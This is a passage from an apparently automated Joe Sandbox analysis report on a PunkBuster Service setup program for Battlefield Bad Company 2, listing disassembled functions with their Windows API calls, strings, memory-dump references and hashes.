                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 3$frame
                                              • API String ID: 3519838083-515625952
                                              • Opcode ID: cdc1f6182bd214d9045f9556bf90022187fa22f43cd70c14b82050586f43efeb
                                              • Instruction ID: b6a62f28c7b3057c80a3f56269876836a777f19cbbca4682d8e1b937b331a87d
                                              • Opcode Fuzzy Hash: cdc1f6182bd214d9045f9556bf90022187fa22f43cd70c14b82050586f43efeb
                                              • Instruction Fuzzy Hash: 1C31B670900288DFCB01DF64CC50BDEBBB4AF15304F1084BFE559A3291DB785A44CB69
                                              Function 00409783 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 41COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • PunkBuster Service Setup v%d.%d %s- Step 1 of 3, xrefs: 004097C2
                                              • Battlefield Bad Company 2, xrefs: 004097AC
                                              • PunkBuster Service Setup v%d.%d %s - Step 1 of 2, xrefs: 004097C9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Battlefield Bad Company 2$PunkBuster Service Setup v%d.%d %s - Step 1 of 2$PunkBuster Service Setup v%d.%d %s- Step 1 of 3
                                              • API String ID: 3519838083-2774316313
                                              • Opcode ID: 3eed306f2d1d9ac54f449b40445fcb4ccd03e3b679d1554b8b83fbbae08ab14b
                                              • Instruction ID: a3b6ba2b4f641e5437b8940605f5d530bd99bbe82a93198287cab800592f0113
                                              • Opcode Fuzzy Hash: 3eed306f2d1d9ac54f449b40445fcb4ccd03e3b679d1554b8b83fbbae08ab14b
                                              • Instruction Fuzzy Hash: 48118EB0900208DFC700EB54C885FE973B4BB14704F0081BEA605A72E2DB785A85CB59
                                              Function 004C318C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37threadCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(?,00000000,004BF718,004C27EB,00000000,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C,004BD4BE), ref: 004C318E
                                              • SetLastError.KERNEL32(00000000,?,?,?,0048B8FF,?,?,?,?,?,00401022,?,00000000), ref: 004C31F2
                                                • Part of subcall function 004BDC28: __lock.LIBCMT ref: 004BDC6C
                                                • Part of subcall function 004BDC28: RtlAllocateHeap.KERNEL32(00000008,?,0050EEB0,00000010,004C31B4,00000001,0000008C,?,?,?,0048B8FF,?), ref: 004BDCAA
                                              • GetCurrentThreadId.KERNEL32 ref: 004C31DB
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$AllocateCurrentHeapThread__lock
                                              • String ID: pl
                                              • API String ID: 523559038-1786839575
                                              • Opcode ID: cb88780e55af28360521e8d65bb42ce1b6262d24d1d92811166b2b08986586a4
                                              • Instruction ID: 4e15fead1da765310891571215d60c9e77c149a2e6dfa2c0e8c96e45c1ec75c6
                                              • Opcode Fuzzy Hash: cb88780e55af28360521e8d65bb42ce1b6262d24d1d92811166b2b08986586a4
                                              • Instruction Fuzzy Hash: 38F0C835601751DFEB201F70AC49F563AA5EF04762B04462EF8429A2B1DF7989408B94
                                              Function 004CA431 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 29libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleA.KERNEL32(kernel32.dll,00511168,00000010,004C27DA,00000000,00000FA0,0050F518,00000008,004C2842,?,?,?,004BD45A,00000004,0050EE80,0000000C), ref: 004CA454
                                              • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 004CA464
                                              Strings
                                              • kernel32.dll, xrefs: 004CA44F
                                              • InitializeCriticalSectionAndSpinCount, xrefs: 004CA45E
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                              • API String ID: 1646373207-3733552308
                                              • Opcode ID: 73cf7e5df0098c1c7d62d08b5aa5e6f9ae56e660d87144e9d257d9a9c70f2567
                                              • Instruction ID: e39fc0700cef1ff0848360b4e5987c70e5a34b69ece04a98e9f0bb628ab4d806
                                              • Opcode Fuzzy Hash: 73cf7e5df0098c1c7d62d08b5aa5e6f9ae56e660d87144e9d257d9a9c70f2567
                                              • Instruction Fuzzy Hash: 96F02438540789ABDB049FA4EC49B8D3AA1BB0070CB40826AE812D91A0E7B88590CB1E
                                              Function 004C0F23 Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMON
                                              Download Yara Rule
                                              APIs
                                              • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 004C100B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: f1aec3b431f16c29a1ae30a5e188e7390e467b4d3a74b67c9d504762f04221b2
                                              • Instruction ID: 37db7b8bce4b1befea4292eedc19632542016c0b127df2ad6a9c700e1150dc0e
                                              • Opcode Fuzzy Hash: f1aec3b431f16c29a1ae30a5e188e7390e467b4d3a74b67c9d504762f04221b2
                                              • Instruction Fuzzy Hash: 35514C75900288CFDB72DFAACC80BEDBBB8AF46304F10415EE8559B262D7745A41CF15
                                              Function 0041A460 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageA.USER32(?,00000087,00000000,00000000), ref: 0041A487
                                              • GetWindowLongA.USER32(?,000000EB), ref: 0041A494
                                              • GetWindow.USER32(?,00000004), ref: 0041A4C7
                                              • GetParent.USER32(?), ref: 0041A4CE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Window$LongMessageParentSend
                                              • String ID:
                                              • API String ID: 2571540958-0
                                              • Opcode ID: f87e2db7d642b718cdb5e782880d86ae2cc92590bc91bf3e2829ce3af81419a0
                                              • Instruction ID: d14a4c9261c9bfe6ea89002c6d86b05037672ab9812461308a4e6696fe1dd4f1
                                              • Opcode Fuzzy Hash: f87e2db7d642b718cdb5e782880d86ae2cc92590bc91bf3e2829ce3af81419a0
                                              • Instruction Fuzzy Hash: FA01F9366436217BC72296255C14EBB3659EFC62A0F054526F9089B321FB78CC1242AE
                                              Function 0043C050 Relevance: 6.0, APIs: 4, Instructions: 28COMMON
                                              Download Yara Rule
                                              APIs
                                              • 73A0A570.USER32(00000000,?,?,?,00411042,?,?,?,?,?,?,?,?,00424576,00000000,?), ref: 0043C055
                                              • 73A14620.GDI32(00000000,00000008,?,?,00411042,?,?,?,?,?,?,?,?,00424576,00000000,?), ref: 0043C06E
                                              • 73A14620.GDI32(00000000,0000000A,?,?,00411042,?,?,?,?,?,?,?,?,00424576,00000000,?), ref: 0043C07D
                                              • 73A0A480.USER32(00000000,00000000,?,?,00411042,?,?,?,?,?,?,?,?,00424576,00000000,?), ref: 0043C084
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: A14620$A480A570
                                              • String ID:
                                              • API String ID: 787695464-0
                                              • Opcode ID: bde29647645f6f62431ba4956432fcdcdd02fa35a371fb05dad9c327f0370f79
                                              • Instruction ID: 647cde6ad6d127a058f9c9188c9070063168958bc0e1fe4f50d07073395ba153
                                              • Opcode Fuzzy Hash: bde29647645f6f62431ba4956432fcdcdd02fa35a371fb05dad9c327f0370f79
                                              • Instruction Fuzzy Hash: E1E09235381351ABD3208F759CC5B4BBBA8EFC9B62F114025F508A7290C73098018B79
                                              Function 0043C010 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                              Download Yara Rule
                                              APIs
                                              • 73A0A570.USER32(00000000,00000000,?,00000000,00438343,00438F8E,00000000,?), ref: 0043C015
                                              • 73A14620.GDI32(00000000,0000000E), ref: 0043C026
                                              • 73A14620.GDI32(00000000,0000000C), ref: 0043C02D
                                              • 73A0A480.USER32(00000000,00000000), ref: 0043C035
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: A14620$A480A570
                                              • String ID:
                                              • API String ID: 787695464-0
                                              • Opcode ID: ade5a79a339f2738448f29a114826966c7061f7a60283a8ffba4494c2e38d894
                                              • Instruction ID: 466c391f0f8cbe89267b517a2457401cac0d02a45389bc6ea158d6bce9fdb278
                                              • Opcode Fuzzy Hash: ade5a79a339f2738448f29a114826966c7061f7a60283a8ffba4494c2e38d894
                                              • Instruction Fuzzy Hash: 65D0123A7812647BF21017755C8AF575A5DCFC96E2F000132FA05DA2E185704C018678
                                              Function 0040982C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 88COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              • Are you sure you want to un-install the PunkBuster Service?, xrefs: 004098DC
                                              • Un-Install PunkBuster Service, xrefs: 004098CF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: Are you sure you want to un-install the PunkBuster Service?$Un-Install PunkBuster Service
                                              • API String ID: 3519838083-2198055661
                                              • Opcode ID: e3005dc6f923ab64d1770305e9fc94f3ff6c3953480be8e329947beef0f464ac
                                              • Instruction ID: 3f86f169e8ea4f34bfe8433b3b75cf2069d93a569d5023850833cb461211cf54
                                              • Opcode Fuzzy Hash: e3005dc6f923ab64d1770305e9fc94f3ff6c3953480be8e329947beef0f464ac
                                              • Instruction Fuzzy Hash: 0831BF71C002899ECB00DF69C888BEDBBB4AB16314F5481BED455773E2C7385A08CB55
                                              Function 0043B020 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStockObject.GDI32 ref: 0043B068
                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 0043B07E
                                                • Part of subcall function 00498F70: GetVersionExA.KERNEL32 ref: 00498F97
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2196188016.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.2196171252.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196283420.00000000004E1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196320668.000000000052B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196522230.00000000006CD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196541089.00000000006CE000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196562469.00000000006E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196584231.0000000000700000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196635087.000000000077B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196652474.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196669073.0000000000788000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196687518.000000000078B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196707791.0000000000791000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196730512.0000000000795000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196750619.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196771745.00000000007A2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196799128.00000000007D2000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.2196818883.00000000007D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_4wECQoBvYC.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object$StockVersion
                                              • String ID: MS Shell Dlg 2
                                              • API String ID: 3343268070-3198668166
                                              • Opcode ID: cec77b159c0ea83f857012d5b4ae8469a07a81413d6283470a563a47e63a9e61
                                              • Instruction ID: e155e28d74422bf90b24fc72c595fcbdcfc2968bb2b625db651e1d297fa305ef
